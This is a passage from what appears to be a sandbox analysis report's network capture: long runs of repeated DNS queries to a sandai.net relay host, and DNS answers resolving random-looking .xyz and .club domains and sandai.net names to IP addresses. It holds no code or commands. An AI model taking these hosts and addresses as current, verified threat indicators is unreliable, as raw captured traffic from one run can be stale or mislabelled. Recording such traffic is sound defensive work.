                                                                                                                                                  Dec 5, 2020 08:44:15.970869064 CET192.168.2.38.8.8.80x122fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:16.517447948 CET192.168.2.38.8.8.80x8a7fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:17.044955015 CET192.168.2.38.8.8.80xd65dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:17.575695992 CET192.168.2.38.8.8.80x1808Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:18.123766899 CET192.168.2.38.8.8.80x905fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:18.669492006 CET192.168.2.38.8.8.80xfbd3Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:19.217264891 CET192.168.2.38.8.8.80x44adStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:19.749089956 CET192.168.2.38.8.8.80x6843Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:20.296304941 CET192.168.2.38.8.8.80xca7dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:20.842305899 CET192.168.2.38.8.8.80x492Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:21.357323885 CET192.168.2.38.8.8.80x769fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:21.890527010 CET192.168.2.38.8.8.80x9e60Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:22.444001913 CET192.168.2.38.8.8.80x8d8fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:22.983156919 CET192.168.2.38.8.8.80x9f9bStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:23.502736092 CET192.168.2.38.8.8.80xf2e2Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:24.046238899 CET192.168.2.38.8.8.80x434fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:24.591864109 CET192.168.2.38.8.8.80xf3f3Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:25.124499083 CET192.168.2.38.8.8.80xf392Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:25.670666933 CET192.168.2.38.8.8.80xca6eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:26.218074083 CET192.168.2.38.8.8.80xb27dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:26.749294996 CET192.168.2.38.8.8.80xee8fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:27.264238119 CET192.168.2.38.8.8.80xb72cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:27.796911001 CET192.168.2.38.8.8.80x7fabStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:28.345057964 CET192.168.2.38.8.8.80x2273Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:28.874937057 CET192.168.2.38.8.8.80xd524Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:29.404752970 CET192.168.2.38.8.8.80xab11Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:29.942001104 CET192.168.2.38.8.8.80x7ec4Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:30.538630962 CET192.168.2.38.8.8.80x58e1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:31.092473030 CET192.168.2.38.8.8.80xa3a5Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:31.612140894 CET192.168.2.38.8.8.80x53cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:32.162920952 CET192.168.2.38.8.8.80xb3a6Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:32.686481953 CET192.168.2.38.8.8.80x1bd9Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:33.233244896 CET192.168.2.38.8.8.80x3fdeStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:33.780996084 CET192.168.2.38.8.8.80xbae7Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:34.295671940 CET192.168.2.38.8.8.80x2cffStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:34.842538118 CET192.168.2.38.8.8.80x8f55Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:35.360580921 CET192.168.2.38.8.8.80xde4eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:35.905311108 CET192.168.2.38.8.8.80xefb1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:36.460200071 CET192.168.2.38.8.8.80x76e6Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:37.004929066 CET192.168.2.38.8.8.80xbfffStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:37.547617912 CET192.168.2.38.8.8.80x5b38Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:38.062274933 CET192.168.2.38.8.8.80x19afStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:38.577480078 CET192.168.2.38.8.8.80xb75dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:39.108922005 CET192.168.2.38.8.8.80x7d09Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:39.640337944 CET192.168.2.38.8.8.80xb04eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:40.195466042 CET192.168.2.38.8.8.80x14baStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:40.734242916 CET192.168.2.38.8.8.80x2ad0Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:41.249723911 CET192.168.2.38.8.8.80x9080Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:41.781835079 CET192.168.2.38.8.8.80xf744Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:42.316418886 CET192.168.2.38.8.8.80xd5c9Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:42.843507051 CET192.168.2.38.8.8.80x8c9cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:43.386141062 CET192.168.2.38.8.8.80x55c1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:43.907150030 CET192.168.2.38.8.8.80x7badStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:44.437218904 CET192.168.2.38.8.8.80x405fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:44.984076977 CET192.168.2.38.8.8.80x415dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:45.500381947 CET192.168.2.38.8.8.80x521cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:46.069277048 CET192.168.2.38.8.8.80x912aStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:46.597650051 CET192.168.2.38.8.8.80xf57cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:47.150854111 CET192.168.2.38.8.8.80x2942Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:47.720201015 CET192.168.2.38.8.8.80xf3d4Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:48.252520084 CET192.168.2.38.8.8.80xe143Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:48.798460960 CET192.168.2.38.8.8.80x59d5Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:49.317466021 CET192.168.2.38.8.8.80x6525Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:49.859556913 CET192.168.2.38.8.8.80x2253Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:50.391560078 CET192.168.2.38.8.8.80xfacfStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:50.906727076 CET192.168.2.38.8.8.80x66cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:51.454305887 CET192.168.2.38.8.8.80xe583Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:51.970223904 CET192.168.2.38.8.8.80xfc99Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:52.522691011 CET192.168.2.38.8.8.80x20e2Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:53.047398090 CET192.168.2.38.8.8.80xbb96Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:53.563600063 CET192.168.2.38.8.8.80xdc95Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:54.095347881 CET192.168.2.38.8.8.80xc8d3Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:54.626287937 CET192.168.2.38.8.8.80xd67eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:55.156809092 CET192.168.2.38.8.8.80xfcc1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:55.688621998 CET192.168.2.38.8.8.80xd800Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:56.235286951 CET192.168.2.38.8.8.80x89abStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:56.756474972 CET192.168.2.38.8.8.80x8ec8Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:57.310049057 CET192.168.2.38.8.8.80x4c3Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:57.830212116 CET192.168.2.38.8.8.80xa191Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:58.378381014 CET192.168.2.38.8.8.80xea8bStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:58.923456907 CET192.168.2.38.8.8.80xff92Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:59.453959942 CET192.168.2.38.8.8.80x7b7cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:59.989223003 CET192.168.2.38.8.8.80xefe7Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:00.532516956 CET192.168.2.38.8.8.80xcd07Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:01.066127062 CET192.168.2.38.8.8.80x8b57Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:01.598042011 CET192.168.2.38.8.8.80x2300Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:02.144747019 CET192.168.2.38.8.8.80x2707Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:02.690109968 CET192.168.2.38.8.8.80x2276Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:03.221651077 CET192.168.2.38.8.8.80x1abaStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:03.736870050 CET192.168.2.38.8.8.80x146bStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:04.267421007 CET192.168.2.38.8.8.80xf9deStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:04.783400059 CET192.168.2.38.8.8.80xe7e9Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:05.330240965 CET192.168.2.38.8.8.80xee33Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:05.877887964 CET192.168.2.38.8.8.80xffeaStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:06.407953024 CET192.168.2.38.8.8.80x4136Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:06.940469980 CET192.168.2.38.8.8.80xbad5Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:07.470385075 CET192.168.2.38.8.8.80xfbb4Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:07.985903025 CET192.168.2.38.8.8.80xac9dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:08.503778934 CET192.168.2.38.8.8.80x214aStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:09.033617020 CET192.168.2.38.8.8.80x3d2eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:09.566113949 CET192.168.2.38.8.8.80xf783Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:10.112205029 CET192.168.2.38.8.8.80xf14cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:10.626859903 CET192.168.2.38.8.8.80xb07Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:11.142332077 CET192.168.2.38.8.8.80x6263Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:11.676170111 CET192.168.2.38.8.8.80xfa98Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:12.206394911 CET192.168.2.38.8.8.80xeaa4Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:12.737648010 CET192.168.2.38.8.8.80x9141Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Dec 5, 2020 08:41:53.382879019 CET8.8.8.8192.168.2.30x92a9No error (0)ef6df4af06ba6896.xyz104.28.4.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:41:53.382879019 CET8.8.8.8192.168.2.30x92a9No error (0)ef6df4af06ba6896.xyz104.28.5.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:41:53.382879019 CET8.8.8.8192.168.2.30x92a9No error (0)ef6df4af06ba6896.xyz172.67.194.30A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:42:48.097821951 CET8.8.8.8192.168.2.30xbe88No error (0)ef6df4af06ba6896.xyz104.28.4.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:42:48.097821951 CET8.8.8.8192.168.2.30xbe88No error (0)ef6df4af06ba6896.xyz104.28.5.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:42:48.097821951 CET8.8.8.8192.168.2.30xbe88No error (0)ef6df4af06ba6896.xyz172.67.194.30A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:12.422032118 CET8.8.8.8192.168.2.30x2421No error (0)1c5491a87d65f1ef.club172.67.142.39A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:12.422032118 CET8.8.8.8192.168.2.30x2421No error (0)1c5491a87d65f1ef.club104.27.183.69A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:12.422032118 CET8.8.8.8192.168.2.30x2421No error (0)1c5491a87d65f1ef.club104.27.182.69A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:28.410265923 CET8.8.8.8192.168.2.30xf72fNo error (0)ef6df4af06ba6896.xyz104.28.4.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:28.410265923 CET8.8.8.8192.168.2.30xf72fNo error (0)ef6df4af06ba6896.xyz104.28.5.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:28.410265923 CET8.8.8.8192.168.2.30xf72fNo error (0)ef6df4af06ba6896.xyz172.67.194.30A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:33.050405025 CET8.8.8.8192.168.2.30x34d3No error (0)ef6df4af06ba6896.xyz104.28.4.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:33.050405025 CET8.8.8.8192.168.2.30x34d3No error (0)ef6df4af06ba6896.xyz104.28.5.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:33.050405025 CET8.8.8.8192.168.2.30x34d3No error (0)ef6df4af06ba6896.xyz172.67.194.30A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:43.599741936 CET8.8.8.8192.168.2.30xdb46No error (0)EF6DF4AF06BA6896.xyz104.28.4.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:43.599741936 CET8.8.8.8192.168.2.30xdb46No error (0)EF6DF4AF06BA6896.xyz104.28.5.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:43.599741936 CET8.8.8.8192.168.2.30xdb46No error (0)EF6DF4AF06BA6896.xyz172.67.194.30A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)hub5pn.hz.sandai.nethub5pn.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)hub5pn.sandai.netcnc.hub5pn.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net153.3.232.174A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net157.255.225.49A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net211.91.242.37A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net157.255.225.53A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net111.206.4.164A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net153.3.232.175A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net58.144.251.1A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net118.212.146.20A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net118.212.146.21A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net111.206.4.176A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net58.144.251.2A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET8.8.8.8192.168.2.30x6bfcNo error (0)cnc.hub5pn.sandai.net211.91.242.38A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.481640100 CET8.8.8.8192.168.2.30x79fcNo error (0)hub5pnc.hz.sandai.nethub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.481640100 CET8.8.8.8192.168.2.30x79fcNo error (0)hub5pnc.sandai.netcnc.hub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.481640100 CET8.8.8.8192.168.2.30x79fcNo error (0)cnc.hub5pnc.sandai.net47.92.99.221A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.481640100 CET8.8.8.8192.168.2.30x79fcNo error (0)cnc.hub5pnc.sandai.net47.92.100.53A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.542771101 CET8.8.8.8192.168.2.30x7c4No error (0)hubstat.hz.sandai.nethubstat.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.542771101 CET8.8.8.8192.168.2.30x7c4No error (0)hubstat.sandai.netcnchubstat.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.542771101 CET8.8.8.8192.168.2.30x7c4No error (0)cnchubstat.sandai.net140.206.225.136A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.542771101 CET8.8.8.8192.168.2.30x7c4No error (0)cnchubstat.sandai.net140.206.225.232A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)hub5idx.shub.hz.sandai.nethub5t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)hub5t.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.72A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.44A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)hub5c.hz.sandai.nethub5c.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)hub5c.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.44A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.72A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.884772062 CET8.8.8.8192.168.2.30x600aNo error (0)hub5u.hz.sandai.nethub5u.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.884772062 CET8.8.8.8192.168.2.30x600aNo error (0)hub5u.sandai.netbgphub5u.sandai.netCNAME (Canonical name)IN (0x0001)
